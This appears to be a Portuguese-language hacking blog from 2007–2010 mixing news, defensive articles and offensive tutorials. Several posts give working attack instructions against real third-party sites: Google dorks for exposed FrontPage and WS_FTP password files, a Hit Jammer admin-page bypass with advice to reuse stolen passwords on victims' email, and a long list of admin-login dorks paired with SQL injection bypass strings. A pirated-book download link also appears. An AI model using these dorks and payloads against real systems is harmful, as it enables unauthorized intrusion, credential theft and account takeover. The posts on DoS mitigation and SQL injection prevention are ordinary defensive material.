Mostrando postagens com marcador hacker. Mostrar todas as postagens
Mostrando postagens com marcador hacker. Mostrar todas as postagens

27/03/2010

Hacker invade site horadoplaneta.org.br


Hoje, Sábado,27 de março de 2010 ,milhões de pessoas no mundo inteiro apagaram suas luzes por uma hora em uma demonstração simbólica pelo Planeta, quem entrou no site www.horadoplaneta.org.br deve ter ficado assustado. Ao invés de encontrar a página da WWF-Brasil, o que era visto (e ainda até as 00:40 do domingo) era “0wn3d by FIREH4CK3R - Fail Shell”

Veja a mensagem que foi colocada na página :

Hoje, diferente de todas as minhas invasões, não irei falar sobre patriotismo, quero tocar no assunto que o próprio movimento do site me faz tocar, quero falar sobre onde vivemos:
A TERRA
Fiquei super decepcionado ao pensar que pessoas perdem o tempo de todos os dias para assistirem uma novela ou mesmo ao BBB 10, mas, ao se tratar do planeta, serem incapazes de desligar por apenas 1 hora as luzes da sua casa.
Será que a ignorância tomou mesmo conta dos seres humanos? Tá aí mais uma pergunta que deixo sem resposta!
Enquanto ao movimento, parabéns a todos os organizadores, eu mesmo participei e parabenizo à todos que participaram, show a iniciativa!
De nada foi alterado no site, apenas a página inicial!

Tudo evolui, um ano de Fail Shell Group!
We are: FIREH4CK3R
Greetz: Agd_Scorp - Red_Eye - RitualistaS - [#Elite Top Team]
Ler mais

28/10/2009

Disco virtual

* Disco virtual DISPONÍVEL para visitantes. Para acessar use os seguintes dados:

http://www.escoladehackers.com.br/disco
Usuário: visitante@escoladehackers.com.br
Senha: zvisitante

Alunos matriculados verifiquem na sala de cada curso as novas senhas de acesso ao disco virtual.

* O Desafio 24 Horas de outubro já foi escolhido: NMap avançado. E você já pode votar no Desafio 24 Horas do mês de novembro. As opções são Street Hacker (o game), Metasploit ou Hackeando o Wordpress. Você já pode votar e escolhar o que prefere aprender no Desafio 24 Horas de novembro. O NMap avançado vai ser realizado no próximo final de semana (31/10 e 1/11).

* Atualização do Curso 3 (Nível 1) - Máquinas Virtuais
Estamos atualizando o curso 3 do nível 1 sobre máquinas virtuais. O objetivo é incluir conhecimento novo, como por exemplo a virtualização nativa do Windows 2008 e Seven, falar também da DOSBox para jogar games antigos e da QEMU que usamos para rodar o Damn Small Linux no ambiente Windows. Também queremos reduzir o tamanho do arquivo de vídeo que está com quase 400MMB, fugindo ao padrão da média de 30MB por curso gravado entre os gravados recentemente.

* Atualização do Curso 1 (Nível 1) - Iniciação a Escola de Hackers
Estamos atualizando o curso 1 do nível 1 sobre Iniciação a Escola de Hackers. O objetivo é transformar o manual de matrículas em vídeo, incluindo as sugestões mais recentes enviadas por estudantes e colaboradores.
Ler mais

24/10/2009

Denial of Service (DOS) Attack no Joomla

A negação de serviço (DoS) é um ataque baseado na tentativa de negar o uso de um servidor ou outro recurso para usuários autorizados. Este é um tipo de ataque direcionado ao servidor de hospedagem, logo, se você hospeda os seus projetos em um bom  HOST, dificilmente sofrerá este tipo de invasão. Entretanto, se você gosta de HOST  barato ou de grátis, ou ainda, montou um HOST na sua garagem sem o devido conhecimento é bom ficar ligado.
 
A forma mais comum deste ataque é sobrecarregar o servidor ou roteador com um número elevado de pedidos, o que irá impedir que o mesmo responda a contento. Outra forma comum do ataque (Dos) é tentar resetar o servidor ou roteador de forma automática, ou seja, uma vez que o processo esteja completo, novo reinício da máquina é solicitado, impedindo o funcionamento e tornando indisponíveis todos os recursos durante o processo.
 
Para evitar o rastreamento dos hackers e também para atingir uma massa crítica de falsos pedidos, o ataque (Dos) muitas vezes é lançado com um vírus ou verme que se alojam em inocentes computadores e a partir deles (hospedeiros), efetuam o ataque. Isto é conhecido como um ataque de negação de serviço distribuído. Em uma determinada hora e data, o código é executado e simultaneamente começa a atacar o alvo.

A maioria dos ataques (Dos) devem ser desviadas ao nível de hardware, por isso, se você estiver executando o servidor do host, certifique-se de ter um bom firewal no lugar para que o mesmo identifique automaticamente o fluxo de tráfego, diferenciando o tráfego normal do anormal. Isto irá impedir o tráfego de dados inválidos passando pela rede.   

O OpenBSD Packet Filter é um  programa chamado "pf" que  suporta um recurso chamado "synproxy" que se coloca entre um servidor de internet e de tráfego. Desempenha o mesmo papel que um firewall no bloqueio tráfego falso. Você pode encontrar mais informações sobre a "pf" em  www.openbsd.org /faq/pf

Até o próximo artigo

Artigo traduzido e adaptado por Júlio Coutinho. O original, está publicado no capítulo 14 do livro Professional Joomla - Programador para Programador, de Dan Rahmel.
Ler mais

23/10/2009

Hacking no joomla!


Hacking Joomla Sites

 Pessoalmente eu gosto Joomla! sites com base porque é fácil de gerir e resolver as coisas, mesmo fazendo o SEO como sobre blogs wordpress e até mesmo criar seu projeto próprio site. Mas esses dias mais e mais Joomla! sites são hackeadas por hackers anônima na web mundial. As razões são facilmente referir aos webmasters inconsciente / proprietários do local a instalação de extensões ou digamos add-ons para o Joomla, resultando em um mais vulnerável de se explorar, os danos maciços e desfiguração de seu site, incluindo perda de perspectivas, as informações pessoais , e no aspecto financeiro.

Como esses eventos havia acontecido? Quando os proprietários do local apontou os dedos para seus anfitriões culpar para o servidor web inseguro, falhou a segurança, a falta de acompanhamento e assim por diante. Mas eles não sabem que, acrescentando algumas extensões sem verificar primeiro se a extensão que eles estão usando tem um bug ou vulneráveis à exploração, então, seria um dos principais motivos que o seu site está propenso a hacking. Pela minha experiência pessoal eu consiga obter os hashes de senha admin do Joomla vários sites baseados em um minuto de explorar a usar o Google como mecanismo de busca. Cracker usando as senhas MD5 hash MD5 criptografado são convertidos em ASCII letras legíveis. Felizmente, um monte de cracker baseado na web MD5 está disponível na net fazendo a velocidade do processo de cracking up.

É realmente um grande problema para o aspecto de segurança em seu site, se você não está ciente desses tipos de vulnerables de bugs e as extensões que você aplicou no seu site Joomla. É melhor aconselhados a administrar e atualizar as extensões usadas (se a atualização dessa extensão está disponível), então você deve atualizá-lo para abordar as questões de segurança conhecidas em seu site.
Ler mais

30/08/2009

Escola de Hackers


Aprenda gratuitamente com quem mais entende de hacker no Brasil.
  • Não precisa ter conhecimento prévio: basta saber navegar na Internet e usar o Windows.
  • Lições para iniciantes, usuários avançados, estudantes de sistemas de informação e profissionais de informática (técnicos, analistas, consultores, administradores de rede, etc).
  • Simplesmente o maior programa de educação continuada para a formação do hacker profissional.
  • E o que é melhor: tudo isto de graça. A Escola de Hackers é um projeto sem fins lucrativos, mantido por doações.

A cada grupo de lições você será avaliado para mudança de nível e poderá solicitar o certificado de conclusão dos cursos concluídos. Nosso certificado é reconhecido em todo o Brasil* e também no Exterior**

* Certificado referente a curso de extensão, conforme previsto na Lei Federal 9394/99.
** Os alunos residentes no exterior deverão entrar em contato com os Órgãos de Educação de seus países para saber como validar o certificado fora do Brasil.


www.escoladehackers.com.br

Ler mais

12/07/2009

Roubando senha de paginas em Front Page

Sabe aquela página feita em Front Page. Você está louco para conseguir o login da página e senha. Use a porcaria do google entaum pow Very Happy
Segue o comando abaixo copie e cole no google.!!!!

"# -FrontPage-" inurl:service.pwd
Ler mais

Descobrindo Senhas de Ftp

digite no google o seguinte comando:
filetype:ini ws_ftp pwd

vai aparecer algo assim:
Ex.:
UID=anonymous
PWD=
29BEA5A170EE544D8F2D7CEA802A182BA76A387266A14799AEA53D73B0A

Na verdade o Username está a mostra como todos podemos ver UID=....
a senha que é o PWD precisa deve ser desincriptada com o programa "wcftpcrack"
ele decodifica num piscar do nossos olhos a senha para gente!!!!
Ler mais

Roube senhas com o Google


o autor e o dono do blog nao se responsabilizam por mau uso do conteudo aqui contido nem pelos erros ortograifocos tambem contidos nesse post. .
Abraços a todos .
Mais uma vez o google se mostra uma arma incrivelmente potente para os hackers quando em conjunto com a ignorância de administradores de sites...
O Hit Jammer 1.0 eh um script para unix que permite a você gerenciar o trafego e modificar o site sem precisar utilizar HTML. É geralmente utilizado por aqueles sites "underground" que pagam pelas navegações, etc.
O autor do script já soltou um patch para correção dos bugs, mas muitos administradores nem se quer deram noticia disso.
Um bug critico no script permite que nós facilmente acessemos a área admin, podendo ver todos os nomes de usuários, email, e senha... :twisted:
Bom, chega de papo, vamos ao que interessa 8)
Vá ate o google (www.google.com) e digite no campo de busca "POWERED BY HIT JAMMER 1.0!" (sem aspas) vão aparecer vários sites, escolha sua vitima e mãos a obra!
Entre no site de sua escolha e quando entrar mude o link para:
Ex: www.trafficgold.com vai virar www.trafficgold.com/admin/admin.php
Pronto, se o site estiver vulnerável (o que é muito provável) vai aparecer os nomes de usuário, senha e e-mail!
Como muitos usuários sem muitas noções sobre segurança utilizam as mesmas senhas em vários lugares, vá ate o servidor de e-mail (aquele que aparece depois do "@") e procure pelo link para acessar o mail.
Copie a senha e o email, quando entrar, você pode pedir por senhas perdidas procurar pelo numero do CC, etc..
Autoria de Ø Rodrigo KYLLOPARDIUNØ
Ler mais

05/07/2009

SQL injection com asp

Olá galera.
Fiz este pequeno tutorial meio as pressas,mas espero que voces gostem,principalmente quem esta começando agora Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “. Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.
1) Acesse http://www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:

Citação:

allinurl:admin/index.asp allinurl:admin/default.asp allinurl:admin/admin.asp allinurl:admin/login.asp allinurl:/admin/entrar.asp allinurl:/admin/default.asp allinurl:/admin/index.asp allinurl:/admin/login.asp allinurl:/admin/password.asp allinurl:/admin/senha.asp allinurl:/login/login.asp allinurl:/adm/login.asp allinurl:/adm/index.asp allinurl:/adm/default.asp allinurl:/login/index.asp allinurl:/login/default.asp allinurl:/webmaster/login.asp allinurl:/webadmin/default.asp allinurl:/webadmin/index.asp allinurl:/webadmin/default.asp allinurl:/menu_admin/default.asp allinurl:/menu_admin/index.asp allinurl:/menu_admin/login.asp allinurl:/noticias/admin/ allinurl:/news/admin/ allinurl:/cadastro/admin/ allinurl:/portal/admin/ allinurl:/site/admin/ allinurl:/home/admin.asp allinurl:/home/admin/index.asp allinurl:/home/admin/default.asp allinurl:/home/admin/login.asp allinurl:/web/admin/index.asp allinurl:/web/admin/default.asp allinurl:/web/admin/login.asp allinurl:/home/adm/login.asp allinurl:/home/adm/senha.asp allinurl:/home/adm/index.asp allinurl:/home/adm/defaul.asp allinurl:/menu/admin/index.asp allinurl:/menu/admin/default.asp allinurl:/menu/admin/login.asp allinurl:/menu/admin/admin.asp allinurl:/painel/admin/admin.asp allinurl:/painel/admin/login.asp allinurl:/painel/admin/index.asp allinurl:/painel/admin/default.asp allinurl:/site/admin/default.asp allinurl:/site/admin/index.asp allinurl:/site/admin/login.asp allinurl:/asp/admin/login.asp allinurl:/asp/admin/index.asp allinurl:/asp/admin/default.asp allinurl:/shop/admin/default.asp allinurl:/shop/admin/index.asp allinurl:/shop/admin/login.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp allinurl:/pedidos/admin/default.asp allinurl:/pedidos/admin/index.asp allinurl:/pedidos/admin/login.asp allinurl:/compras/admin/ allinurl:/clientes/admin/ allinurl:/busines/admin/ allinurl:/area_restrita/admin.asp allinurl:/area_restrita/login.asp allinurl:/area_restrita/index.asp allinurl:/acesso/admin.asp allinurl:/acesso/admin/default.asp allinurl:/acesso/admin/index.asp allinurl:/post/admin/default.asp allinurl:/post/admin/ allinurl:/post/admin/index.asp allinurl:/post/admin/login.asp allinurl:/eshop/admin/ allinurl:/eshop/admin.asp allinurl:/eshop/admin/default.asp allinurl:/eshop/admin/index.asp allinurl:/comercio/admin.asp allinurl:/comercio/admin/default.asp allinurl:/comercio/admin/index.asp allinurl:/news/admin/login.asp allinurl:/news/admin/default.asp allinurl:/news/admin/index.asp allinurl:/imprensa/login.asp allinurl:/imprensa/admin.asp allinurl:/imprensa/admin/default.asp allinurl:/imprensa/admin/index.asp allinurl:/imprensa/admin/login.asp allinurl:/banners/admin.asp allinurl:/banners/admin/default.asp allinurl:/banners/admin/index.asp allinurl:/banners/admin/login.asp allinurl: allinurl:/banner/admin/ allinurl:/banner/admin/default.asp allinurl:/banner/admin/index.asp allinurl:/newsleter/admin.asp allinurl:/newsleter/admin/default.asp allinurl:/newsleter/admin/index.asp allinurl:/principal/admin.asp allinurl:/principal/admin/default.asp allinurl:/principal/admin/index.asp allinurl:/principal/admin/login.asp allinurl:/editar/admin.asp allinurl:/editar/admin/login.asp allinurl:/editar/admin/index.asp allinurl:/editar/admin/default.asp allinurl:/form/admin.asp allinurl:/admin/admin.asp allinurl:/admin/index.asp allinurl:/admin/admin/default.asp allinurl:/edit/admin/index.asp allinurl:/edit/admin/default.asp allinurl:/menu/admin/senha.asp allinurl:/painel/admin/senha.asp allinurl:/menu_admin/senha.asp allinurl:/pedidos/admin/senha.asp allinurl:/vendas/admin/senha.asp allinurl:/principal/admin/senha.asp allinurl:/home/admin/senha.asp allinurl:/news/admin/senha.asp allinurl:/noticias/admin/senha.asp allinurl:/portal/admin/senha.asp allinurl:/site/admin/senha.asp allinurl:/admin/admin/adm.asp allinurl:/admin/adm/senha.asp allinurl:/adm/admin/login.asp allinurl:/adm/admin/index.asp allinurl:/adm/admin/default.asp allinurl:/admin/loja/senha.asp allinurl:/admin/lojas/default.asp allinurl:/admin/lojas/index.asp allinurl:/loja/admin.asp allinurl:/db/admin/index.asp allinurl:/db/admin/login.asp allinurl:/db/admin/default.asp allinurl:/db/admin/senha.asp allinurl:/host/admin/default.asp allinurl:/host/admin/index.asp allinurl:/host/admin/login.asp allinurl:/login/admin.asp allinurl:/login_admin/index.asp allinurl:/login_admin/default.asp allinurl:/login_admin/login.asp allinurl:/store/admin.asp allinurl:/store/admin/default.asp allinurl:/store/admin/index.asp allinurl:/stroe/admin/login.asp allinurl:/images/admin/ allinurl:/client/admin.asp allinurl:/order/admmin.asp allinurl:/order/admin/index.asp allinurl:/order/admin/login.asp allinurl:/order/admin/default.asp allinurl:/admin/senha.asp allinurl:/strore/admin/senha.asp allinurl:/controle/admin.asp allinurl:/controle/admin/index.asp allinurl:/controle/admin/default.asp allinurl:/controle/admin/login.asp allinurl:/parceiros/admin.asp allinurl:/parceiros/admin/login.asp allinurl:/parceiros/admin/default.asp allinurl:/parceiros/admin/index.asp allinurl:/administrador/login.asp allinurl:/webmaster/login.asp allinurl:/webmaster/senha.asp allinurl:/webmaster/autenticar.asp allinurl:/admin/autenticar.asp allinurl:/admin/logout.asp allinurl:/admin/logar.asp allinurl:/webmaster/logar.asp allinurl:/store/admin/logar.asp allinurl:/shopping/admin.asp allinurl:/shopping/admin/login.asp allinurl:/shopping/admin/index.asp allinurl:/shopping/admin/default.asp allinurl:/admin/menu.asp allinurl:/admin/painel.asp allinurl:/shop/admin/logar.asp allinurl:/admin/acesso.asp allinurl:/restrito/admin.asp allinurl:/restrito/acesso/admin.asp allinurl:/restrito/adm/login.asp allinurl:/webmaster/entrar.asp allinurl:/admin/site/entrar.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp


Após voces pesquisarem,uma série de píginas serão encontradas.
Geralmente quando voce acessa uma destas píginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo )


Citação:

b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

Só lembrando que qualquer bom scanner detecta esta vulnerabilidade,o ACUNETIX é um exemplo de um programa de scan .

NÂO NOS RESPOSABILIZAMOS POR QUALQUER ATO PRATICADO POR VOCÊS PERANTE ESTE TUTORIAL O OBJETIVO DESSE TUTORIAL É EVITAR ESSE TIPO DE FALHA.

Este tutorial realmente é para o pesoa que esta começando,aconselho a voces darem uma estudada em PHP injection e principalmente em XSS,que para mim é a técnica do futuro,pois muitos sites estão vulneraveis.

>>BY TeCnOhEnRy <<
Ler mais

04/07/2009

Intellitamper- faça download de um site


Intellitamper é uma ferramenta capaz de fazer um scan (varredura) de todos os arquivos HTML do endereço do website escolhido. O legal dessa ferramenta é que ela nos mostra todos os diretórios, arquivos, links e
 muito mais disponíveis no website sem a necessidadede ter que navegar por todas elas.





*Disponível para plata
forma Windows


Download
Ler mais

23/11/2008

SQL Injection,O que é e como se proteger

A segurança das informações é um assunto que exige atenção especial, principalmente em se tratando de informações armazenadas em bancos de dados acessados via web.
Uma das técnicas de fraude mais conhecida pelos desenvolvedores web é a SQL Injection. Trata-se da manipulação de uma instrução SQL através das variáveis quem compõem os parâmetros recebidos por um script server-side, tal como PHP, ASP, ColdFusion e outros.
O principal motivo pelo qual deve-se impossibilitar a utilização da SQL Injection está no fato de que, através de uma simples instrução SQL, como por exemplo, uma projeção de dados, outras operações podem ser executadas, podendo impactar sobre o esquema das tabelas, os dados armazenados, e até mesmo sobre elementos do sistema operacional, tendo em vista que alguns bancos de dados permitem a execução de comandos do shell do próprio sistema operacional.
Detectando a vulnerabilidade de um sistema
Para ilustrar o conceito de SQL Injection, a seguinte simulação pode ser realizada. Imaginemos que um script de validação de acesso de usuários tenha sido desenvolvido como segue

Nas linhas 3 e 4, as variáveis $usuario e $senha, respectivamente, recebem o conteúdo submetido por um formulário através do método POST. Eis a fonte do problema.
Suponha que a seguinte entrada tenha sido informada no campo usuário no formulário chamador do script de validação.

Logo, a query string resultante será:




Se nenhuma outra validação for realizada, o usuário mal intencionado terá efetuado login no sistema, sem ao menos informar um usuário contido na tabela. Isto foi possível pois o valor de entrada informado não recebeu o tratamento devido, sendo adicionado à instrução para ser executado. Vale ressaltar que as validações apresentadas no exemplo são apenas ilustrativas, havendo a necessidade de checagens mais eficazes para um script de validação de acesso.
Impossibilitando o uso de SQL Injection
Para que se esteja livre da utilização da SQL Injection, certas providências devem ser tomadas. Algumas das ações serão realizadas no servidor de banco de dados, outras devem ser garantidas pelo código fonte.
Deve-se tomar cuidado com a configuração do usuário que estabelece a conexão com o banco de dados. O ideal é que as permissões de acesso deste usuário estejam restritamente limitadas às funções que irá realizar, ou seja, para a exibição de um relatório, a conexão com o banco de dados deve ser realizada por um usuário com permissões de leitura e acesso somente às tabelas necessárias para sua operação.
Todos os valores originados da coleta de dados externos, devem ser validadas e tratadas a fim de impedir a execução de eventuais instruções destrutivas ou operações que não sejam as esperadas.
Um tratamento básico para a execução de querys com variáveis contendo valores informados pelo usuário:



Com a utilização da função addslashes() será adicionada uma barra invertida antes de cada aspa simples e aspa dupla encontrada, processo conhecido como escape. Se a diretiva de configuração do PHP magic_quotes_gpc estiver ativada, o escape é realizado automaticamente sobre os dados de COOKIES e dados recebidos através dos métodos GET e POST. Neste caso, não deve ser efetuado o tratamento com addslashes(). A função get_magic_quotes_gpc(), disponível nas versões do PHP a partir da 3.0.6, retorna a configuração atual da diretiva magic_quotes_gpc.
Abaixo, a query string resultante da aplicação do tratamento mencionado:



Em muitos bancos de dados, existem funções específicas para o tratamento de variáveis em query strings, o que diminui a compatibilidade do código fonte para operação com outros sistemas de banco de dados.
Outra dica importante é evitar a exibição das mensagem de erro em um servidor de aplicação em produção, pois geralmente nos erros ou alertas são exibidos caminhos de diretórios do sistema de arquivos e informações à respeito do esquema do banco de dados, podendo comprometer a segurança do sistema.
Para ocultar a exibição de erros e alertas do PHP, é necessária a configuração da diretiva display_errors para Off no arquivo de configurações do PHP.
Cabe ao desenvolvedor estar atento às possíveis brechas de segurança existentes nos códigos fonte que produz, principalmente quando o que está em jogo é um bem de grande valia: a informação. Tenha consciência. Isto evita futuras dores de cabeça e atritos desnecessários com o cliente.
Ler mais

21/07/2007

Servidor proxy anônimo

Você pode navegar usando um servidor proxy anônimo. Procure um no publicproxyservers , como usar: No próprio IE, vá em Ferramentas Opções de Internet... Conexões Configuração de LAN e marque a opção Usar um servidor proxy para a rede local. No espaço Endereço e Porta você coloca o que é fornecido no site. Se você está usando um proxy classificado como anônimo, o IP mostrado em tua conexão será o do proxy e não o teu IP real. Faça um teste, por exemplo, no site http://www.whatsmyip.org/. Tem o http://www.proxydetect.com/ que é mais completo que o whatismyip , Esse tbem mostra o Head dos pacotes, IP, país, tipo de proxy ou conexao... Se você quiser usar proxy em algum outro programa que não seja navegador, talvez você precise de proxy do tipo Socks 5, você encontra uma lista deles em http://www.atomintersoft.com/products/alive-proxy/socks5-list/ so Lembrando que você não estará 100% oculto e que haverá um perda de desempenho da sua conexão com a Internet.
Mas se for esse o seu intuito tente utilizar os softwares "No IP" ou "Anonymizer" eles ocultam o seu IP enquanto você acessa a Internet... fazendo com que você fique invisível na rede... ou seja ninguém vai conseguir enxergar o seu endereço IP.Para download e maiores informações veja o site dos produtos:http://www.no-ip.comhttp://www.anonymizer.comTalvez não possa funcionar, pois os pulg-ins No-IP e o Anonymizer trabalham ocultando o seu IP e não permitem que sites na Web instalem cookies na sua máquina... ou seja este site aonde você utiliza os games deve instalar um cookie na sua máquina para verificar a sua identidade, obter o seu IP e relacionar um nickname a ele ... se a sua máquina não for localizada por este site (se eles não conseguirem o seu IP) eles não vão instalar este cookie e você provavelmente não terá acesso.Obs: não tenho certeza pois nunca utilizei estes programas com este objetivo !Dê uma olhada nestes artigos que descrevem melhor a utilização destes programas:Navegue incógnito http://pcworld.terra.com.br/pcw/pratica/dicas/Internet/0066.htmlPlug-in permite navegar na Web anonimamentehttp://pcworld.terra.com.br/pcw/update/4338.html
Ler mais

10/06/2007

Apostilas

Ler mais

Livro Hacker por Marco Aurélio thompson

click na imagem ou copie o codigo-->
http://rapidshare.com/files/12828747/Livro.Proibido.do.Curso.de.H4ck3r.rar
Ler mais

tente hackear




TenteHackear é um jogo em forma de site . O jogador encontra páginas com falhas intencionais, e é desafiado a hackear essas falhas. Em cada falha ele consegue a senha para o nível seguinte, podendo inclusive participar do ranking de jogadores
Ler mais

Indentificando um invazor

Identificando o Invasor Você deve usar um bom Firewall e bloquear todas as tentativas de entrada e saída indevidaE quando o seu Firewall detectar esta tentativa de entrada indevida ele te informa o numero IP do invasor, e ai o que fazer com este número ?Vá para o site da FAPESP http://registro.br/ e digite o IP dele para se informar quem é o dono deste IP, se este IP for do exterior vá para http://www.geektools.com/whois.php ou http://www.internic.net/whois.html ou http://www.networksolutions.com/ e digite o IP para se informar-se
No site da Fapesp introduza o IP no campo Domínio e chique em pesquisar
Pronto agora está vendo que é o dono deste IP
Aqui também se pesquisa quem é o dono do Domínio
Ler mais

H4ck3r


Não sou Hacker, para se torna um Hacker precisa conhecer muito. Muitos e muitos anos de estudo.
O que é Hacker ?
Não há uma tradução de Hacker, porem significar "fuçar". Hacker não é o Guru que sabe tudo, Hacker é aquele que fuça até que aprenderEle tem a Informática como Hooby e não se contemta em aprender tudo aquilo que é ensinado oficialmete, portanto alem de conhecer tudo que é ensinado, vai mais fundo para se descobrir os segredos jamais revelado.
E como aprende aquilo que não é ensinado?Fuçando (hackeando), ou seja por conta própria
Segundo a imprensa o que é Hacker ?
A imprensa considera como sendo "Hacker" tudo aquilo que seja diferente do leigo
Considera os bandido da Web, Crackers, Lamers, Arackers, Phreaker, Wannabe, Larva, idiotas da web, como sendo um "Hacker"
Enfim tudo aquilo que eles (leigos da imprensa) não entendem é jogado numa vala comun só para dizer que sabe, o que não sabe, e para almentar a audiência E eles falam com a boca "cheia" como se fose um especialista em tudo, sendo que na verdade quem diz saber tudo não sabe nada !!!

Lamers
Este é o principiante que acha que sabe tupo porque "pegou" alguns programinhas de invasão e segurança e com ele conseque fazer algo que os leigos ficam espantado, mas na real não sabe nada. É um novato metido a besta.
Wannabe
Este sabe um pouca mais que um Lamer, já não é um novato, porem tem muito o que aprender, dominar alguns programinhas de invasão e começa a enternder um pouco.
Larva
O Larva é aquele que está se tornando um Hacker, ele já desemvolve seu próprio metodo de invasão e segurnça

Arackers
São as pessoas do submundo da Web fazem reuniões de madrugada, fingem ser ousados planejam ataques. Istó é resultado de muita TV
Script Kiddie

Script Kiddie é um tipo de hacker mais comum que existe, é um hacker baderneiro, ele não esta atraz de um alvo específico Ele esta atraz de um ponto vulnerável em qualquer máquina da web
Mesmo que não tenha nada na sua máquina se estiver desprotegido ele vai dar um "olhadinha", quem sabe ele não deixa uma porta tipo "backdoor" e concertar os pontos vulnerável da sua máquina, desta forma outros não poderão entrar na sua máquina, mas ele terá acesso, pois já criou uma porta para isto.
Ou seja se na sua máquina não tem proteção, algem pode estar te visitado constantemente, sem que você saiba.
E a vítima vai dizer isto nunca aconteceu comigo !!!!! Eu estou seguro !!!!

Phreacker
É uma modalidade de hackers especialista em telefonia, sabe como realizar ligaçoes telefônicas internacionais sem pagar, ou pagando apenas a ligação local. Conhece o sistema telefônico como ninquem, conseque granpear as converças, porem não tem má fé.Claro que não se trata de um Santo, mas não tem intenção de prejudicar ningem.
Crackers
São pessoas de má fé que usa o conhecimento dos Hacker para praticar o mal.Tem o conhecimento do Hacker, mas não tem a filosofia Hacker, retira trava de segurança dos programas para piratear programas, invade sistemas e provoca danos a terceiros
Ler mais
ATENÇÃO! Todos os links e arquivos que se encontram no site, estão hospedados na própria Internet, somente indicamos onde se encontra. Qualquer arquivo protegido por algum tipo de lei deve permanecer, no máximo, 24 horas em seu computador. Eles podem ser baixados apenas para teste, devendo o usuário apagá-lo ou comprá-lo após 24 horas. A Aquisição desses arquivos pela Internet é de única e exclusiva responsabilidade do usuário.
"Você tem o direito de permanencer calado.
Tudo o que você fizer usando o conhecimento deste blog 
poderá ser usado contra você no tribunal."